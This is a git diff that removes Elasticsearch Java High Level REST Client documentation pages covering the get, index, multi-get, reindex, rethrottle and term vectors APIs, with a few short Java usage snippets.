--------------------------------------------------
-<1> Index
-<2> Document id
-<3> Disable fetching `_source`.
-<4> Disable fetching stored fields.
-
-include::../execution.asciidoc[]
-
-
-==== Source exists request
-A variant of the exists request is the `existsSource` method, which additionally checks
-that the document in question has stored its `source`. If the mapping for the index has
-opted to remove support for storing the JSON source in documents, then this method will
-return `false` for documents in this index.
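
A minimal sketch combining both checks (the index name and id are made up, and `client` is
assumed to be an existing `RestHighLevelClient`):

["source","java"]
--------------------------------------------------
GetRequest getRequest = new GetRequest("posts", "1");
// Make the request as light as possible: no source, no stored fields
getRequest.fetchSourceContext(new FetchSourceContext(false));
getRequest.storedFields("_none_");

// true if the document exists at all
boolean exists = client.exists(getRequest, RequestOptions.DEFAULT);
// additionally verifies that the document has a stored _source
boolean sourceExists = client.existsSource(getRequest, RequestOptions.DEFAULT);
--------------------------------------------------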
diff --git a/docs/java-rest/high-level/document/get-source.asciidoc b/docs/java-rest/high-level/document/get-source.asciidoc deleted file mode 100644 index f5a2ca8ec5d..00000000000 --- a/docs/java-rest/high-level/document/get-source.asciidoc +++ /dev/null @@ -1,72 +0,0 @@ --- -:api: get-source -:request: GetSourceRequest -:response: GetSourceResponse --- - -[id="{upid}-{api}"] -=== Get Source API - -This API helps to get only the `_source` field of a document. - -[id="{upid}-{api}-request"] -==== Get Source Request - -A +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id - -[id="{upid}-{api}-request-optional"] -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-optional] --------------------------------------------------- -<1> `FetchSourceContext` 's first argument `fetchSource` must be `true`, otherwise -`ElasticsearchException` get thrown -<2> Arguments of the context `excludes` and `includes` are optional -(see examples in Get API documentation) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-preference] --------------------------------------------------- -<1> Preference value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-realtime] --------------------------------------------------- -<1> Set realtime flag to `false` (`true` by default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Perform a refresh before retrieving the document (`false` by default) - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Source Response - -The returned +{response}+ contains the field `source` that represents the -source of a document as a map. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/document/get.asciidoc b/docs/java-rest/high-level/document/get.asciidoc deleted file mode 100644 index 2916eb9335c..00000000000 --- a/docs/java-rest/high-level/document/get.asciidoc +++ /dev/null @@ -1,126 +0,0 @@ --- -:api: get -:request: GetRequest -:response: GetResponse --- - -[id="{upid}-{api}"] -=== Get API - -[id="{upid}-{api}-request"] -==== Get Request - -A +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id - -[id="{upid}-{api}-request-optional-arguments"] -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-no-source] --------------------------------------------------- -<1> Disable source retrieval, enabled by default - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-include] --------------------------------------------------- -<1> Configure source inclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-exclude] --------------------------------------------------- -<1> Configure source exclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-stored] --------------------------------------------------- -<1> Configure retrieval for specific stored fields (requires fields to be -stored separately in the mappings) -<2> Retrieve the `message` stored field (requires the field to be stored -separately in the mappings) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-preference] --------------------------------------------------- -<1> Preference value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-realtime] --------------------------------------------------- -<1> Set realtime flag to `false` (`true` by default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Perform a refresh before retrieving the document (`false` by default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> Version - 
-["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version-type] --------------------------------------------------- -<1> Version type - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Response - -The returned +{response}+ allows to retrieve the requested document along with -its metadata and eventually stored fields. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Retrieve the document as a `String` -<2> Retrieve the document as a `Map` -<3> Retrieve the document as a `byte[]` -<4> Handle the scenario where the document was not found. Note that although -the returned response has `404` status code, a valid +{response}+ is -returned rather than an exception thrown. Such response does not hold any -source document and its `isExists` method returns `false`. - -When a get request is performed against an index that does not exist, the -response has `404` status code, an `ElasticsearchException` gets thrown -which needs to be handled as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-indexnotfound] --------------------------------------------------- -<1> Handle the exception thrown because the index does not exist - -In case a specific document version has been requested, and the existing -document has a different version number, a version conflict is raised: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-conflict] --------------------------------------------------- -<1> The raised exception indicates that a version conflict error was returned diff --git a/docs/java-rest/high-level/document/index.asciidoc b/docs/java-rest/high-level/document/index.asciidoc deleted file mode 100644 index 5a201a02a88..00000000000 --- a/docs/java-rest/high-level/document/index.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ --- -:api: index -:request: IndexRequest -:response: IndexResponse --- - -[id="{upid}-{api}"] -=== Index API - -[id="{upid}-{api}-request"] -==== Index Request - -An +{request}+ requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-string] --------------------------------------------------- -<1> Index -<2> Document id for the request -<3> Document source provided as a `String` - -==== Providing the document source -The document source can be provided in different ways in addition to the -`String` example shown above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-map] --------------------------------------------------- -<1> Document source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-xcontent] --------------------------------------------------- -<1> Document source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - 
-["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-shortcut] --------------------------------------------------- -<1> Document source provided as `Object` key-pairs, which gets converted to -JSON format - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Routing value - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for primary shard to become available as a `TimeValue` -<2> Timeout to wait for primary shard to become available as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh policy as a `WriteRequest.RefreshPolicy` instance -<2> Refresh policy as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> Version - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version-type] --------------------------------------------------- -<1> Version type - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-op-type] --------------------------------------------------- -<1> Operation type provided as an `DocWriteRequest.OpType` value -<2> Operation type provided as a `String`: can be `create` or `index` (default) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-pipeline] --------------------------------------------------- -<1> The name of the ingest pipeline to be executed before indexing the document - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Index Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Handle (if needed) the case where the document was created for the first -time -<2> Handle (if needed) the case where the document was rewritten as it was -already existing -<3> Handle the situation where number of successful shards is less than -total shards -<4> Handle the potential failures - -If there is a version conflict, an `ElasticsearchException` will -be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-conflict] --------------------------------------------------- -<1> The raised exception indicates that a version conflict error was returned - -Same will happen in case `opType` was set to `create` 
and a document with -same index and id already existed: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-optype] --------------------------------------------------- -<1> The raised exception indicates that a version conflict error was returned diff --git a/docs/java-rest/high-level/document/multi-get.asciidoc b/docs/java-rest/high-level/document/multi-get.asciidoc deleted file mode 100644 index 18f94d123d6..00000000000 --- a/docs/java-rest/high-level/document/multi-get.asciidoc +++ /dev/null @@ -1,134 +0,0 @@ --- -:api: multi-get -:request: MultiGetRequest -:response: MultiGetResponse --- - -[id="{upid}-{api}"] -=== Multi-Get API - -The `multiGet` API executes multiple <> -requests in a single http request in parallel. - -[id="{upid}-{api}-request"] -==== Multi-Get Request - -A +{request}+ is built empty and you add `MultiGetRequest.Item`s to configure -what to fetch: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index -<2> Document id -<3> Add another item to fetch - -==== Optional arguments - -`multiGet` supports the same optional arguments that the -<> supports. -You can set most of these on the `Item`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-no-source] --------------------------------------------------- -<1> Disable source retrieval, enabled by default - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-include] --------------------------------------------------- -<1> Configure source inclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source-exclude] --------------------------------------------------- -<1> Configure source exclusion for specific fields - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-stored] --------------------------------------------------- -<1> Configure retrieval for specific stored fields (requires fields to be -stored separately in the mappings) -<2> Retrieve the `foo` stored field (requires the field to be stored -separately in the mappings) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-item-extras] --------------------------------------------------- -<1> Routing value -<2> Version -<3> Version type - -{ref}/search-search.html#search-preference[`preference`], -{ref}/docs-get.html#realtime[`realtime`] -and -{ref}/docs-get.html#get-refresh[`refresh`] can be set on the main request but -not on any items: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-top-level-extras] --------------------------------------------------- -<1> Preference value -<2> Set realtime flag to `false` (`true` by default) -<3> Perform a refresh before retrieving the document (`false` by default) - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] 
-==== Multi Get Response
-
-The returned +{response}+ contains a list of `MultiGetItemResponse`s in
-`getResponses` in the same order that they were requested.
-`MultiGetItemResponse` contains *either* a
-<<{upid}-get-response,`GetResponse`>> if the get succeeded
-or a `MultiGetResponse.Failure` if it failed. A success looks just like a
-normal `GetResponse`.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> `getFailure` returns null because there isn't a failure.
-<2> `getResponse` returns the `GetResponse`.
-<3> Retrieve the document as a `String`
-<4> Retrieve the document as a `Map`
-<5> Retrieve the document as a `byte[]`
-<6> Handle the scenario where the document was not found. Note that although
-the returned response has a `404` status code, a valid `GetResponse` is
-returned rather than an exception thrown. Such a response does not hold any
-source document and its `isExists` method returns `false`.
-
-When one of the subrequests was performed against an index that does not exist,
-`getFailure` will contain an exception:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-indexnotfound]
--------------------------------------------------
-<1> `getResponse` is null.
-<2> `getFailure` isn't and contains an `Exception`.
-<3> That `Exception` is actually an `ElasticsearchException`
-<4> and it has a status of `NOT_FOUND`. It'd have been an HTTP 404 if this
-wasn't a multi get.
-<5> `getMessage` explains the actual cause, `no such index`.
-
-In case a specific document version has been requested, and the existing
-document has a different version number, a version conflict is raised:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-conflict]
--------------------------------------------------
-<1> `getResponse` is null.
-<2> `getFailure` isn't and contains an `Exception`.
-<3> That `Exception` is actually an `ElasticsearchException`
-<4> and it has a status of `CONFLICT`. It'd have been an HTTP 409 if this
-wasn't a multi get.
-<5> `getMessage` explains the actual cause of the version conflict.
diff --git a/docs/java-rest/high-level/document/multi-term-vectors.asciidoc b/docs/java-rest/high-level/document/multi-term-vectors.asciidoc
deleted file mode 100644
index 52d633b2d59..00000000000
--- a/docs/java-rest/high-level/document/multi-term-vectors.asciidoc
+++ /dev/null
@@ -1,59 +0,0 @@
---
-:api: multi-term-vectors
-:request: MultiTermVectorsRequest
-:response: MultiTermVectorsResponse
-:tvrequest: TermVectorsRequest
---
-
-[id="{upid}-{api}"]
-=== Multi Term Vectors API
-
-The Multi Term Vectors API allows you to get multiple term vectors at once.
-
-[id="{upid}-{api}-request"]
-==== Multi Term Vectors Request
-There are two ways to create a +{request}+.
-
-The first way is to create an empty +{request}+, and then add individual
-<<{upid}-term-vectors,term vectors requests>> to it.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Create an empty +{request}+.
-<2> Add the first +{tvrequest}+ to the +{request}+.
-<3> Add the second +{tvrequest}+ for an artificial doc to the +{request}+.
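
A rough sketch of this first approach could look like the following (index, ids and field names
are assumptions for illustration, and `client` is an existing `RestHighLevelClient`):

["source","java"]
--------------------------------------------------
MultiTermVectorsRequest request = new MultiTermVectorsRequest();

// Build and add individual term vectors requests
TermVectorsRequest first = new TermVectorsRequest("authors", "1");
first.setFields("user");
request.add(first);

TermVectorsRequest second = new TermVectorsRequest("authors", "2");
second.setFields("user");
request.add(second);

// Execute synchronously
MultiTermVectorsResponse response = client.mtermvectors(request, RequestOptions.DEFAULT);
--------------------------------------------------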
-
-
-The second way can be used when all term vectors requests share the same
-arguments, such as index and other settings. In this case, a template
-+{tvrequest}+ can be created with all necessary settings set, and
-this template request can be passed to +{request}+ along with all
-documents' ids for which to execute these requests.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-template]
--------------------------------------------------
-<1> Create a template +{tvrequest}+.
-<2> Pass documents' ids and the template to the +{request}+.
-
-
-include::../execution.asciidoc[]
-
-
-[id="{upid}-{api}-response"]
-==== Multi Term Vectors Response
-
-+{response}+ allows you to get the list of term vectors responses,
-each of which can be inspected as described in
-<<{upid}-term-vectors>>.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> Get a list of `TermVectorsResponse`
-
-
diff --git a/docs/java-rest/high-level/document/reindex.asciidoc b/docs/java-rest/high-level/document/reindex.asciidoc
deleted file mode 100644
index c094a5f1ab7..00000000000
--- a/docs/java-rest/high-level/document/reindex.asciidoc
+++ /dev/null
@@ -1,186 +0,0 @@
---
-:api: reindex
-:request: ReindexRequest
-:response: BulkByScrollResponse
---
-
-[id="{upid}-{api}"]
-=== Reindex API
-
-[id="{upid}-{api}-request"]
-==== Reindex Request
-
-A +{request}+ can be used to copy documents from one or more indexes into a
-destination index.
-
-It requires an existing source index and a target index which may or may not exist before the request. Reindex does not attempt
-to set up the destination index. It does not copy the settings of the source index. You should set up the destination
-index prior to running a `_reindex` action, including setting up mappings, shard counts, replicas, etc.
-
-The simplest form of a +{request}+ looks like this:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Creates the +{request}+
-<2> Adds a list of sources to copy from
-<3> Adds the destination index
-
-The `dest` element can be configured like the index API to control optimistic concurrency control. Just leaving out
-`versionType` (as above) or setting it to `internal` will cause Elasticsearch to blindly dump documents into the target.
-Setting `versionType` to `external` will cause Elasticsearch to preserve the version from the source, create any documents
-that are missing, and update any documents that have an older version in the destination index than they do in the
-source index.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-versionType]
--------------------------------------------------
-<1> Set the versionType to `EXTERNAL`
-
-Setting `opType` to `create` will cause `_reindex` to only create missing documents in the target index. All existing
-documents will cause a version conflict. The default `opType` is `index`.
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-opType] --------------------------------------------------- -<1> Set the opType to `create` - -By default version conflicts abort the `_reindex` process but you can just count -them instead with: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-conflicts] --------------------------------------------------- -<1> Set `proceed` on version conflict - -You can limit the documents by adding a query. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-query] --------------------------------------------------- -<1> Only copy documents which have field `user` set to `kimchy` - -It’s also possible to limit the number of processed documents by setting `maxDocs`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-maxDocs] --------------------------------------------------- -<1> Only copy 10 documents - -By default `_reindex` uses batches of 1000. You can change the batch size with `sourceBatchSize`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-sourceSize] --------------------------------------------------- -<1> Use batches of 100 documents - -Reindex can also use the ingest feature by specifying a `pipeline`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-pipeline] --------------------------------------------------- -<1> set pipeline to `my_pipeline` - -+{request}+ also supports a `script` that modifies the document. It allows you to -also change the document's metadata. The following example illustrates that. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-script] --------------------------------------------------- -<1> `setScript` to increment the `likes` field on all documents with user `kimchy`. - -+{request}+ supports reindexing from a remote Elasticsearch cluster. When using a remote cluster the query should be -specified inside the `RemoteInfo` object and not using `setSourceQuery`. If both the remote info and the source query are -set it results in a validation error during the request. The reason for this is that the remote Elasticsearch may not -understand queries built by the modern query builders. The remote cluster support works all the way back to Elasticsearch -0.90 and the query language has changed since then. When reaching older versions, it is safer to write the query by hand -in JSON. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-remote] --------------------------------------------------- -<1> set remote elastic cluster - -+{request}+ also helps in automatically parallelizing using `sliced-scroll` to -slice on `_id`. Use `setSlices` to specify the number of slices to use. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-slices] --------------------------------------------------- -<1> set number of slices to use - -+{request}+ uses the `scroll` parameter to control how long it keeps the -"search context" alive. -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-scroll] --------------------------------------------------- -<1> set scroll time - - -==== Optional arguments -In addition to the options above the following arguments can optionally be also provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the reindex request to be performed as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-refresh] --------------------------------------------------- -<1> Refresh index after calling reindex - -include::../execution.asciidoc[] - -[id="{upid}-{api}-task-submission"] -==== Reindex task submission -It is also possible to submit a +{request}+ and not wait for it completion with the use of Task API. This is an equivalent of a REST request -with wait_for_completion flag set to false. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{hlrc-tests}/ReindexIT.java[submit-reindex-task] --------------------------------------------------- -<1> A +{request}+ is constructed the same way as for the synchronous method -<2> A submit method returns a `TaskSubmissionResponse` which contains a task identifier. -<3> The task identifier can be used to get `response` from a completed task. 
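For orientation, the following is a minimal, hedged sketch of how the request options described above might fit together before execution. It assumes an existing `RestHighLevelClient` named `client`; the index names and query are invented for illustration and are not part of the tested snippets referenced above.

["source","java"]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.index.query.TermQueryBuilder;
import org.elasticsearch.index.reindex.BulkByScrollResponse;
import org.elasticsearch.index.reindex.ReindexRequest;

public class ReindexSketch {
    static BulkByScrollResponse copyUsers(RestHighLevelClient client) throws IOException {
        ReindexRequest request = new ReindexRequest();
        request.setSourceIndices("source-index");   // hypothetical source index
        request.setDestIndex("dest-index");         // hypothetical destination index
        request.setConflicts("proceed");            // count version conflicts instead of aborting
        request.setSourceQuery(new TermQueryBuilder("user", "kimchy")); // limit the copied documents
        request.setRefresh(true);                   // make the destination searchable when done
        return client.reindex(request, RequestOptions.DEFAULT);
    }
}
--------------------------------------------------

The same request object also accepts the other options shown above, such as `opType`, `pipeline`, `slices` and `scroll`, before it is executed.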
- -[id="{upid}-{api}-response"] -==== Reindex Response - -The returned +{response}+ contains information about the executed operations and -allows to iterate over each result as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get total time taken -<2> Check if the request timed out -<3> Get total number of docs processed -<4> Number of docs that were updated -<5> Number of docs that were created -<6> Number of docs that were deleted -<7> Number of batches that were executed -<8> Number of skipped docs -<9> Number of version conflicts -<10> Number of times request had to retry bulk index operations -<11> Number of times request had to retry search operations -<12> The total time this request has throttled itself not including the current throttle time if it is currently sleeping -<13> Remaining delay of any current throttle sleep or 0 if not sleeping -<14> Failures during search phase -<15> Failures during bulk index operation diff --git a/docs/java-rest/high-level/document/rethrottle.asciidoc b/docs/java-rest/high-level/document/rethrottle.asciidoc deleted file mode 100644 index cb606521a1d..00000000000 --- a/docs/java-rest/high-level/document/rethrottle.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ --- -:api: rethrottle -:request: RethrottleRequest -:response: ListTasksResponse --- - -[id="{upid}-{api}"] -=== Rethrottle API - -[id="{upid}-{api}-request"] -==== Rethrottle Request - -A +{request}+ can be used to change the current throttling on a running -reindex, update-by-query or delete-by-query task or to disable throttling of -the task entirely. It requires the task Id of the task to change. 
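As a hedged illustration of where such a task id might come from, the sketch below reuses the reindex task submission API from the previous section and wraps the returned identifier in a `RethrottleRequest`; the variable names and throttle value are made up. The tested snippets that follow show the two supported forms of the request.

["source","java"]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.RethrottleRequest;
import org.elasticsearch.client.tasks.TaskSubmissionResponse;
import org.elasticsearch.index.reindex.ReindexRequest;
import org.elasticsearch.tasks.TaskId;

public class RethrottleSketch {
    static RethrottleRequest forSubmittedReindex(RestHighLevelClient client,
                                                 ReindexRequest reindexRequest) throws IOException {
        // Submit the reindex as a task and keep its identifier (e.g. "nodeId:12345")
        TaskSubmissionResponse submission =
                client.submitReindexTask(reindexRequest, RequestOptions.DEFAULT);
        TaskId taskId = new TaskId(submission.getTask());
        // Throttle the running task to 50 requests per second
        return new RethrottleRequest(taskId, 50.0f);
    }
}
--------------------------------------------------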
- -In its simplest form, you can use it to disable throttling of a running -task using the following: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-disable-request] --------------------------------------------------- -<1> Create a +{request}+ that disables throttling for a specific task id - -By providing a `requestsPerSecond` argument, the request will change the -existing task throttling to the specified value: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Request to change the throttling of a task to 100 requests per second - -The rethrottling request can be executed by using one of the three appropriate -methods depending on whether a reindex, update-by-query or delete-by-query task -should be rethrottled: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-execution] --------------------------------------------------- -<1> Execute reindex rethrottling request -<2> The same for update-by-query -<3> The same for delete-by-query - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -The asynchronous execution of a rethrottle request requires both the +{request}+ -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> Execute reindex rethrottling asynchronously -<2> The same for update-by-query -<3> The same for delete-by-query - -The asynchronous method does not block and returns immediately. -Once it is completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. A typical listener looks like this: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-async-listener] --------------------------------------------------- -<1> Code executed when the request is successfully completed -<2> Code executed when the request fails with an exception - -[id="{upid}-{api}-response"] -==== Rethrottle Response - -Rethrottling returns the task that has been rethrottled in the form of a -+{response}+. The structure of this response object is described in detail -in <>. diff --git a/docs/java-rest/high-level/document/term-vectors.asciidoc b/docs/java-rest/high-level/document/term-vectors.asciidoc deleted file mode 100644 index e8d4a25a2ca..00000000000 --- a/docs/java-rest/high-level/document/term-vectors.asciidoc +++ /dev/null @@ -1,101 +0,0 @@ --- -:api: term-vectors -:request: TermVectorsRequest -:response: TermVectorsResponse --- - -[id="{upid}-{api}"] -=== Term Vectors API - -Term Vectors API returns information and statistics on terms in the fields -of a particular document. The document could be stored in the index or -artificially provided by the user. - - -[id="{upid}-{api}-request"] -==== Term Vectors Request - -A +{request}+ expects an `index`, a `type` and an `id` to specify -a certain document, and fields for which the information is retrieved. 
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-
-Term vectors can also be generated for artificial documents, that is for
-documents not present in the index:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-artificial]
--------------------------------------------------
-<1> An artificial document is provided as an `XContentBuilder` object,
-the Elasticsearch built-in helper to generate JSON content.
-
-===== Optional arguments
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request-optional-arguments]
--------------------------------------------------
-<1> Set `fieldStatistics` to `false` (default is `true`) to omit document count,
-sum of document frequencies, sum of total term frequencies.
-<2> Set `termStatistics` to `true` (default is `false`) to display
-total term frequency and document frequency.
-<3> Set `positions` to `false` (default is `true`) to omit the output of
-positions.
-<4> Set `offsets` to `false` (default is `true`) to omit the output of
-offsets.
-<5> Set `payloads` to `false` (default is `true`) to omit the output of
-payloads.
-<6> Set `filterSettings` to filter the terms that can be returned based
-on their tf-idf scores.
-<7> Set `perFieldAnalyzer` to specify a different analyzer than
-the one that the field has.
-<8> Set `realtime` to `false` (default is `true`) to retrieve term vectors
-near realtime.
-<9> Set a routing parameter
-
-
-include::../execution.asciidoc[]
-
-
-[id="{upid}-{api}-response"]
-==== Term Vectors Response
-
-+{response}+ contains the following information:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
--------------------------------------------------
-<1> The index name of the document.
-<2> The type name of the document.
-<3> The id of the document.
-<4> Indicates whether or not the document was found.
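As a rough sketch of the request/response round trip (assuming an existing `RestHighLevelClient` named `client`; the index, document id and field names are invented):

["source","java"]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.core.TermVectorsRequest;
import org.elasticsearch.client.core.TermVectorsResponse;

public class TermVectorsSketch {
    static TermVectorsResponse userTermVectors(RestHighLevelClient client) throws IOException {
        TermVectorsRequest request = new TermVectorsRequest("authors", "1"); // index and document id
        request.setFields("user");                                           // fields to inspect
        TermVectorsResponse response = client.termvectors(request, RequestOptions.DEFAULT);
        if (response.getFound() == false) {
            // the document does not exist, so no term vectors are returned
        }
        return response;
    }
}
--------------------------------------------------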
-
-
